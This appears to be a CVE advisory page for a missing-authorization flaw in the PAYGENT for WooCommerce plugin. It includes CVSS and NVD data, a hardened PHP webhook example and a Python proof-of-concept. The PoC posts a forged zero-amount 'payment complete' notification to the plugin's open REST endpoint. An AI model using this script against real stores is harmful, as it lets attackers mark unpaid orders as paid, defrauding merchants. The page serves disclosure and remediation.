Security Vulnerability Report
CVE-2025-14078 CVSS 5.3 MEDIUM

CVE-2025-14078

Published: 2026-01-17 09:15:51
Last Modified: 2026-04-15 00:35:42

Description

The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data available in the NVD record (vulnStatus: Deferred).

PAYGENT for WooCommerce <= 2.4.6 (all versions up to and including 2.4.6)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import json

import requests

# CVE-2025-14078 PoC - Unauthenticated Order Status Manipulation
# Target: WordPress site with PAYGENT WooCommerce plugin <= 2.4.6
# Endpoint: /wp-json/paygent/v1/check/
#
# NOTE: the advisory names only the endpoint. The JSON field names below
# (order_id, payment_status, payment_id, amount, currency) are this PoC's
# own guess at the notification format; they are not confirmed by the
# advisory text or by the referenced plugin source.


def exploit_paygent_unauthorized_access(target_url, order_id):
    """
    Exploit for the Missing Authorization vulnerability in PAYGENT for WooCommerce.
    Sends a forged payment notification to the unauthenticated REST endpoint
    in an attempt to change the status of the given order.
    """
    endpoint = f"{target_url.rstrip('/')}/wp-json/paygent/v1/check/"

    # Forge payment notification payload.
    # Attacker can set arbitrary order status values.
    payload = {
        "order_id": order_id,
        "payment_status": "complete",  # Forge successful payment
        "payment_id": "MALICIOUS-" + str(order_id),
        "amount": 0,
        "currency": "JPY",
    }
    headers = {
        "Content-Type": "application/json",
        "User-Agent": "PAYGENT Payment Gateway/1.0",  # spoofed gateway User-Agent
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        print(f"[*] Target: {target_url}")
        print(f"[*] Endpoint: {endpoint}")
        print(f"[*] Payload: {json.dumps(payload)}")
        print(f"[*] Status Code: {response.status_code}")
        print(f"[*] Response: {response.text}")
        if response.status_code == 200:
            # HTTP 200 only shows the request was accepted; confirm the effect
            # by checking the order's status in WooCommerce.
            print("[+] Request accepted - order status may have been modified")
        else:
            print("[-] Exploit may have failed")
    except requests.exceptions.RequestException as e:
        print(f"[-] Request failed: {e}")


# Usage example
# target = "https://vulnerable-wordpress-site.com"
# order_id = 12345
# exploit_paygent_unauthorized_access(target, order_id)
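The description above pins the bug to two things: a REST route whose permission_callback unconditionally returns true, and a webhook handler that trusts whatever the request says about an order. The following is an added example, not code from the PAYGENT for WooCommerce plugin or from the Wordfence advisory: it shows that weak registration pattern next to a hardened one in which the permission callback authenticates the notification and the handler cross-checks the order before touching its status. Everything about the notification format is an assumption made for illustration (a gateway that signs the raw POST body with HMAC-SHA256 under a shared secret sent in an `X-Paygent-Signature` header, a `paygent_webhook_secret` option, a gateway ID of `paygent`, and JSON fields `order_id`, `amount`, `payment_id`); the real PAYGENT notification format is not described on this page.

```php
<?php
// Added example (not the plugin's code). ASSUMPTIONS, not from the advisory:
// HMAC-SHA256 over the raw body in X-Paygent-Signature, secret stored in the
// option paygent_webhook_secret, gateway ID 'paygent', JSON fields
// order_id / amount / payment_id. Requires WordPress + WooCommerce.

/** Weak registration (the pattern the advisory describes). Not hooked here. */
function paygent_register_route_weak() {
	register_rest_route( 'paygent/v1', '/check/', array(
		'methods'             => 'POST',
		'callback'            => 'paygent_check_webhook', // plugin's own handler, not shown
		'permission_callback' => '__return_true',         // any client on the internet passes
	) );
}

/** Hardened registration: the permission check fails closed. */
function paygent_register_route_hardened() {
	register_rest_route( 'paygent/v1', '/check/', array(
		'methods'             => 'POST',
		'callback'            => 'paygent_check_webhook_hardened',
		'permission_callback' => 'paygent_verify_notification',
	) );
}
add_action( 'rest_api_init', 'paygent_register_route_hardened' );

/**
 * Permission callback: accept the request only if it carries a valid HMAC
 * over the raw body, keyed with the secret shared with the gateway.
 * Returns true or a WP_Error; WordPress turns the error into a 403.
 */
function paygent_verify_notification( WP_REST_Request $request ) {
	$secret = (string) get_option( 'paygent_webhook_secret', '' );
	if ( '' === $secret ) {
		// A missing secret must not degrade into open access.
		return new WP_Error( 'paygent_not_configured', 'Webhook secret not set.', array( 'status' => 403 ) );
	}
	$sig = $request->get_header( 'x-paygent-signature' );
	if ( ! is_string( $sig ) || '' === $sig ) {
		return new WP_Error( 'paygent_unsigned', 'Missing signature.', array( 'status' => 403 ) );
	}
	$expected = hash_hmac( 'sha256', $request->get_body(), $secret );
	// Constant-time comparison; normalise hex case first.
	if ( ! hash_equals( $expected, strtolower( trim( $sig ) ) ) ) {
		return new WP_Error( 'paygent_bad_signature', 'Invalid signature.', array( 'status' => 403 ) );
	}
	return true;
}

/**
 * Handler: even a correctly signed notification is cross-checked against
 * the stored order, so a replayed or mismatched message cannot mark an
 * unpaid order as paid.
 */
function paygent_check_webhook_hardened( WP_REST_Request $request ) {
	$p        = (array) $request->get_json_params();
	$order_id = isset( $p['order_id'] ) ? absint( $p['order_id'] ) : 0;
	$order    = $order_id ? wc_get_order( $order_id ) : false;
	if ( ! $order || 'paygent' !== $order->get_payment_method() ) {
		return new WP_Error( 'paygent_unknown_order', 'Unknown order.', array( 'status' => 404 ) );
	}
	// Replay protection: a paid order is never re-processed.
	if ( $order->is_paid() ) {
		return rest_ensure_response( array( 'result' => 'already_processed' ) );
	}
	// The reported amount must equal the order total; a forged "amount": 0
	// like the one in the PoC above is rejected here.
	$decimals = wc_get_price_decimals();
	$reported = isset( $p['amount'] ) ? wc_format_decimal( (string) $p['amount'], $decimals ) : '';
	if ( '' === $reported || $reported !== wc_format_decimal( $order->get_total(), $decimals ) ) {
		$order->add_order_note( 'PAYGENT notification rejected: amount mismatch.' );
		return new WP_Error( 'paygent_amount_mismatch', 'Amount mismatch.', array( 'status' => 400 ) );
	}
	$txn = isset( $p['payment_id'] ) ? sanitize_text_field( (string) $p['payment_id'] ) : '';
	$order->payment_complete( $txn );
	return rest_ensure_response( array( 'result' => 'ok', 'order_id' => $order_id ) );
}
```

Two layers matter here. The permission callback is what the REST API consults before dispatching, so it is the place to authenticate the sender; the handler is the place to validate the claim (order exists, belongs to this gateway, not already paid, amount matches). With only the first layer, a leaked secret or a replayed message still flips orders; with only the second, an attacker can still probe order IDs. A quick check on a hardened install: an unauthenticated POST to `/wp-json/paygent/v1/check/` without the signature header should come back as a 403 error response from the permission callback, not a 200 with a processed result.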

References

https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/tags/2.4.2/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 (permission callback at line 199, tag 2.4.2)
https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/trunk/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199 (same location in trunk)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432342%40woocommerce-for-paygent-payment-main&new=3432342%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= (plugin changeset 3432342)
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433179%40woocommerce-for-paygent-payment-main&new=3433179%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail= (plugin changeset 3433179)
https://www.wordfence.com/threat-intel/vulnerabilities/id/9de42bd9-a1d2-48f2-a594-4013a9490e25?source=cve (Wordfence advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-14078",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-17T09:15:51.390",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The PAYGENT for WooCommerce plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 2.4.6. This is due to missing authorization checks on the paygent_check_webhook function combined with the paygent_permission_callback function unconditionally returning true on line 199. This makes it possible for unauthenticated attackers to manipulate payment callbacks and modify order statuses by sending forged payment notifications via the `/wp-json/paygent/v1/check/` endpoint."
      },
      {
        "lang": "es",
        "value": "El plugin PAYGENT para WooCommerce para WordPress es vulnerable a Falta de Autorización en todas las versiones hasta la 2.4.6, inclusive. Esto se debe a la falta de comprobaciones de autorización en la función paygent_check_webhook, combinada con el hecho de que la función paygent_permission_callback devuelve 'true' incondicionalmente en la línea 199. Esto hace posible que atacantes no autenticados manipulen las devoluciones de llamada de pago y modifiquen los estados de los pedidos enviando notificaciones de pago falsificadas a través del endpoint '/wp-json/paygent/v1/check/'."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
            "baseScore": 5.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-862"}
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/tags/2.4.2/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/browser/woocommerce-for-paygent-payment-main/trunk/includes/gateways/paygent/class-wc-paygent-endpoint.php#L199",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432342%40woocommerce-for-paygent-payment-main&new=3432342%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3433179%40woocommerce-for-paygent-payment-main&new=3433179%40woocommerce-for-paygent-payment-main&sfp_email=&sfph_mail=",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9de42bd9-a1d2-48f2-a594-4013a9490e25?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}